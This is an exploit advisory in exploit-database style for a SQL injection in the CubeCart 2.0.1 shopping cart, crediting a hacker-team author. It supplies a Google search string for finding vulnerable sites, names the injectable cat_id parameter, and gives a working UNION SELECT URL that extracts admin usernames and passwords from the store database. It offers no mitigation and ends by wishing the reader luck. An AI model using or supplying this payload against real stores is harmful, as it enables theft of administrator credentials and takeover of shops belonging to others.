32 lines
No EOL
1.2 KiB
Text
32 lines
No EOL
1.2 KiB
Text
===================================================================
|
|
CubeCart 2.0.1 SqL InjECti0N
|
|
===================================================================
|
|
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
[+] Author : X_AviaTique_X fr0m OS-TEAM
|
|
[~] Contact : C99@Live.De
|
|
[+] Greats T0: YasMouh , M.K , ArGon HaCKer , Shabah-DZ ,amgad noor
|
|
and all members 0f www.DzHacker.Net
|
|
[~] Site: www.DzHaCkEr.NeT
|
|
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
~Web App. : CubeCart 2.0.1
|
|
~Version : 2.0.1
|
|
~Software: http://www.cubecart.com/
|
|
~Vulnerability Style : SQL Injection
|
|
~Google Keyword : "Powered by CubeCart 2.0.1"
|
|
~String : '
|
|
[~]Date : "18.10.2010"
|
|
[~]Tested on : (L):Unix, (R):5.0.32-Debian
|
|
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
|
|
|
|
~~~~~~~~ Explotation ~~~~~~~~~~~
|
|
String (') SQL Injection Attack..
|
|
http://www.exemple.com/cart/index.php?cat_id=19' {SQL Injection}
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
~~~~~~~~ Exemples ~~~~~~~~~~~
|
|
http://www.exemple.com/cart/index.php?cat_id=19+union+select+group_concat%28username,0x3a,password%29,2,3,4,5,6,7,8+from+cube305_CubeCart_admin_users--
|
|
================================
|
|
|
|
|
|
GoodLUCK. |